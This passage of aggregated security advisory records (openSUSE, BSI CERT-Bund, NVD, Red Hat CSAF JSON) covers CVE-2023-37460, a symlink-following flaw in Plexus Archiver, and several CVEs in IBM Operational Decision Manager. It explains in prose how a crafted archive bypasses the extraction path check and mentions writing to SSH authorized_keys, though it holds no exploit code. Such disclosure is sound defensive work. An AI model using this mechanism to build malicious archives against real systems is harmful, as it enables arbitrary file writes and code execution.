"openSUSE Tumbleweed:plexus-archiver-4.8.0-2.1.x86_64",
"openSUSE Tumbleweed:plexus-archiver-javadoc-4.8.0-2.1.aarch64",
"openSUSE Tumbleweed:plexus-archiver-javadoc-4.8.0-2.1.ppc64le",
"openSUSE Tumbleweed:plexus-archiver-javadoc-4.8.0-2.1.s390x",
"openSUSE Tumbleweed:plexus-archiver-javadoc-4.8.0-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:plexus-archiver-4.8.0-2.1.aarch64",
"openSUSE Tumbleweed:plexus-archiver-4.8.0-2.1.ppc64le",
"openSUSE Tumbleweed:plexus-archiver-4.8.0-2.1.s390x",
"openSUSE Tumbleweed:plexus-archiver-4.8.0-2.1.x86_64",
"openSUSE Tumbleweed:plexus-archiver-javadoc-4.8.0-2.1.aarch64",
"openSUSE Tumbleweed:plexus-archiver-javadoc-4.8.0-2.1.ppc64le",
"openSUSE Tumbleweed:plexus-archiver-javadoc-4.8.0-2.1.s390x",
"openSUSE Tumbleweed:plexus-archiver-javadoc-4.8.0-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-06-15T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2023-37460"
}
]
}
WID-SEC-W-2023-2368
Vulnerability from csaf_certbund - Published: 2023-09-14 22:00 - Updated: 2024-01-07 23:00Summary
IBM Operational Decision Manager: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
IBM Operational Decision Manager ist Software für die Integration von Geschäftsereignissen und Geschäftsregeln, um Entscheidungen über verschiedene Prozesse und Anwendungen hinweg zu automatisieren.
Angriff
Ein entfernter authentifizierter Angreifer kann mehrere Schwachstellen in IBM Operational Decision Manager ausnutzen, um Sicherheitsmaßnahmen zu umgehen, beliebigen Code auszuführen, einen Denial-of-Service-Zustand zu verursachen oder vertrauliche Informationen offenzulegen.
Betroffene Betriebssysteme
- Linux
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "IBM Operational Decision Manager ist Software f\u00fcr die Integration von Gesch\u00e4ftsereignissen und Gesch\u00e4ftsregeln, um Entscheidungen \u00fcber verschiedene Prozesse und Anwendungen hinweg zu automatisieren.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter authentifizierter Angreifer kann mehrere Schwachstellen in IBM Operational Decision Manager ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, beliebigen Code auszuf\u00fchren, einen Denial-of-Service-Zustand zu verursachen oder vertrauliche Informationen offenzulegen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2023-2368 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2023/wid-sec-w-2023-2368.json"
},
{
"category": "self",
"summary": "WID-SEC-2023-2368 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-2368"
},
{
"category": "external",
"summary": "IBM Security Bulletin - 7032928 vom 2023-09-14",
"url": "https://www.ibm.com/support/pages/node/7032928"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:6138 vom 2023-10-26",
"url": "https://access.redhat.com/errata/RHSA-2023:6138"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7105614 vom 2024-01-08",
"url": "https://www.ibm.com/support/pages/node/7105614"
}
],
"source_lang": "en-US",
"title": "IBM Operational Decision Manager: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2024-01-07T23:00:00.000+00:00",
"generator": {
"date": "2024-08-15T17:58:31.143+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.5"
}
},
"id": "WID-SEC-W-2023-2368",
"initial_release_date": "2023-09-14T22:00:00.000+00:00",
"revision_history": [
{
"date": "2023-09-14T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2023-10-26T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-01-07T23:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von IBM aufgenommen"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "IBM Operational Decision Manager \u003c 8.10.5.1",
"product": {
"name": "IBM Operational Decision Manager \u003c 8.10.5.1",
"product_id": "T029909",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:operational_decision_manager:8.10.5.1"
}
}
},
{
"category": "product_name",
"name": "IBM Operational Decision Manager \u003c 8.11.0.1",
"product": {
"name": "IBM Operational Decision Manager \u003c 8.11.0.1",
"product_id": "T029910",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:operational_decision_manager:8.11.0.1"
}
}
},
{
"category": "product_name",
"name": "IBM Operational Decision Manager \u003c 8.11.1",
"product": {
"name": "IBM Operational Decision Manager \u003c 8.11.1",
"product_id": "T029911",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:operational_decision_manager:8.11.1"
}
}
},
{
"category": "product_name",
"name": "IBM Operational Decision Manager \u003c 8.12.0",
"product": {
"name": "IBM Operational Decision Manager \u003c 8.12.0",
"product_id": "T029912",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:operational_decision_manager:8.12.0"
}
}
},
{
"category": "product_name",
"name": "IBM Operational Decision Manager 8.10.5.1 \u003c IF049",
"product": {
"name": "IBM Operational Decision Manager 8.10.5.1 \u003c IF049",
"product_id": "T031894",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:operational_decision_manager:8.10.5.1__if049"
}
}
}
],
"category": "product_name",
"name": "Operational Decision Manager"
}
],
"category": "vendor",
"name": "IBM"
},
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2022-2047",
"notes": [
{
"category": "description",
"text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der HttpURI-Klasse der Eclipse Jetty-Komponente. Durch das Senden einer speziell gestalteten Anfrage kann ein Angreifer diese Schwachstelle ausnutzen, um die Sicherheitsma\u00dfnahmen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T031894",
"67646"
]
},
"release_date": "2023-09-14T22:00:00.000+00:00",
"title": "CVE-2022-2047"
},
{
"cve": "CVE-2014-0107",
"notes": [
{
"category": "description",
"text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Apache Xalan-Java-Komponente aufgrund einer unsachgem\u00e4\u00dfen Behandlung von Ausgabeeigenschaften. Ein entfernter Angreifer kann diese Schwachstelle zur Umgehung von Sicherheitsma\u00dfnahmen ausnutzen."
}
],
"product_status": {
"known_affected": [
"T031894",
"67646"
]
},
"release_date": "2023-09-14T22:00:00.000+00:00",
"title": "CVE-2014-0107"
},
{
"cve": "CVE-2022-25881",
"notes": [
{
"category": "description",
"text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht im Node.js http-cache-semantics-Modul aufgrund eines Denial of Service (ReDoS) durch regul\u00e4re Ausdr\u00fccke. Durch das Senden einer speziell gestalteten Regex-Eingabe unter Verwendung von Request-Header-Werten kann ein entfernter Angreifer diese Schwachstelle ausnutzen, um einen Denial-of-Service-Zustand zu verursachen."
}
],
"product_status": {
"known_affected": [
"T031894",
"67646"
]
},
"release_date": "2023-09-14T22:00:00.000+00:00",
"title": "CVE-2022-25881"
},
{
"cve": "CVE-2022-34169",
"notes": [
{
"category": "description",
"text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Apache Xalan Java XSLT Bibliothekskomponente aufgrund eines Integer Truncation Problems bei der Verarbeitung von b\u00f6sartigen XSLT Stylesheets. Ein entfernter Angreifer kann diese Schwachstelle zur Ausf\u00fchrung von beliebigem Code ausnutzen"
}
],
"product_status": {
"known_affected": [
"T031894",
"67646"
]
},
"release_date": "2023-09-14T22:00:00.000+00:00",
"title": "CVE-2022-34169"
},
{
"cve": "CVE-2022-41946",
"notes": [
{
"category": "description",
"text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Postgresql JDBC-Komponente aufgrund eines nicht eingeschr\u00e4nkten Zugriffs zum Erstellen lesbarer Dateien im TemporaryFolder. Durch das Senden einer speziell gestalteten Anfrage kann ein Angreifer diese Schwachstelle ausnutzen, um vertrauliche Informationen offenzulegen."
}
],
"product_status": {
"known_affected": [
"T031894",
"67646"
]
},
"release_date": "2023-09-14T22:00:00.000+00:00",
"title": "CVE-2022-41946"
},
{
"cve": "CVE-2023-34034",
"notes": [
{
"category": "description",
"text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Komponente VMware Tanzu Spring Security aufgrund einer unsachgem\u00e4\u00dfen Validierung von Benutzereingaben. Mit einer speziell gestalteten Konfiguration kann ein Angreifer diese Schwachstelle ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T031894",
"67646"
]
},
"release_date": "2023-09-14T22:00:00.000+00:00",
"title": "CVE-2023-34034"
},
{
"cve": "CVE-2023-37460",
"notes": [
{
"category": "description",
"text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Komponente Plexus Archiver aufgrund der Verfolgung eines symbolischen Links in der Funktion resolveFile(). Durch Extrahieren einer speziell gestalteten Archivdatei, die einen symbolischen Link enth\u00e4lt, mit AbstractUnArchiver kann ein Angreifer diese Schwachstelle ausnutzen, um beliebigen Code auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T031894",
"67646"
]
},
"release_date": "2023-09-14T22:00:00.000+00:00",
"title": "CVE-2023-37460"
}
]
}
FKIE_CVE-2023-37460
Vulnerability from fkie_nvd - Published: 2023-07-25 20:15 - Updated: 2024-11-21 08:11
Severity ?
8.1 (High) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary
Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink's source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry's content to the symlink's target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| codehaus-plexus | plexus-archiver | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:codehaus-plexus:plexus-archiver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9C596F2F-8933-41D5-A4C9-25F5EC82D26A",
"versionEndExcluding": "4.8.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue."
}
],
"id": "CVE-2023-37460",
"lastModified": "2024-11-21T08:11:45.130",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-07-25T20:15:13.703",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
},
{
"lang": "en",
"value": "CWE-61"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
RHSA-2023:6886
Vulnerability from csaf_redhat - Published: 2023-11-13 09:42 - Updated: 2025-11-21 18:50Summary
Red Hat Security Advisory: plexus-archiver security update
Notes
Topic
An update for plexus-archiver is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
The Plexus project provides a full software stack for creating and executing software projects. Based on the Plexus container, the applications can utilise component-oriented programming to build modular, reusable components that can easily be assembled and reused. The plexus-archiver component provides functions to create and extract archives.
Security Fix(es):
* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for plexus-archiver is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "The Plexus project provides a full software stack for creating and executing software projects. Based on the Plexus container, the applications can utilise component-oriented programming to build modular, reusable components that can easily be assembled and reused. The plexus-archiver component provides functions to create and extract archives.\n\nSecurity Fix(es):\n\n* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2023:6886",
"url": "https://access.redhat.com/errata/RHSA-2023:6886"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2242288",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_6886.json"
}
],
"title": "Red Hat Security Advisory: plexus-archiver security update",
"tracking": {
"current_release_date": "2025-11-21T18:50:04+00:00",
"generator": {
"date": "2025-11-21T18:50:04+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.12"
}
},
"id": "RHSA-2023:6886",
"initial_release_date": "2023-11-13T09:42:49+00:00",
"revision_history": [
{
"date": "2023-11-13T09:42:49+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2023-11-13T09:42:49+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-11-21T18:50:04+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Client Optional (v. 7)",
"product": {
"name": "Red Hat Enterprise Linux Client Optional (v. 7)",
"product_id": "7Client-optional-7.9.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:7::client"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product": {
"name": "Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product_id": "7ComputeNode-optional-7.9.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:7::computenode"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Server Optional (v. 7)",
"product": {
"name": "Red Hat Enterprise Linux Server Optional (v. 7)",
"product_id": "7Server-optional-7.9.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:7::server"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product": {
"name": "Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product_id": "7Workstation-optional-7.9.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:7::workstation"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "plexus-archiver-0:2.4.2-6.el7_9.src",
"product": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src",
"product_id": "plexus-archiver-0:2.4.2-6.el7_9.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/plexus-archiver@2.4.2-6.el7_9?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"product": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"product_id": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/plexus-archiver@2.4.2-6.el7_9?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"product": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"product_id": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/plexus-archiver-javadoc@2.4.2-6.el7_9?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Client Optional (v. 7)",
"product_id": "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Client-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Client Optional (v. 7)",
"product_id": "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src",
"relates_to_product_reference": "7Client-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Client Optional (v. 7)",
"product_id": "7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Client-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7ComputeNode-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src",
"relates_to_product_reference": "7ComputeNode-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7ComputeNode-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Server Optional (v. 7)",
"product_id": "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Server-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Server Optional (v. 7)",
"product_id": "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src",
"relates_to_product_reference": "7Server-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Server Optional (v. 7)",
"product_id": "7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Server-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product_id": "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Workstation-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product_id": "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src",
"relates_to_product_reference": "7Workstation-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product_id": "7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Workstation-optional-7.9.Z"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-37460",
"cwe": {
"id": "CWE-61",
"name": "UNIX Symbolic Link (Symlink) Following"
},
"discovery_date": "2023-10-05T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2242288"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Plexus Archiver. While using AbstractUnArchiver for extracting, an archive might lead to arbitrary file creation and possible remote code execution (RCE). Extracting an archive with an entry in the destination directory as a symbolic link whose target does not exist will bypass the directory destination verification.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "There are factors beyond the attacker\u0027s control. For example, the victim\u0027s server must have an incomplete SSH server configuration by not having the \"~/.ssh/authorized_keys\" existent and also having an SSH Server Port externally accessible. So, an attacker would need, even in other scenarios, to gather configuration settings and previous knowledge about the environment in order to have a successful attack. The impact is Important as code execution might happen, but it is not guaranteed.\n\nRed Hat Fuse 7 contains plexus-archiver as a transitive dependency and does not make it vulnerable during runtime, hence the low impact.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
]
},
"references": [
{
"category": "self",
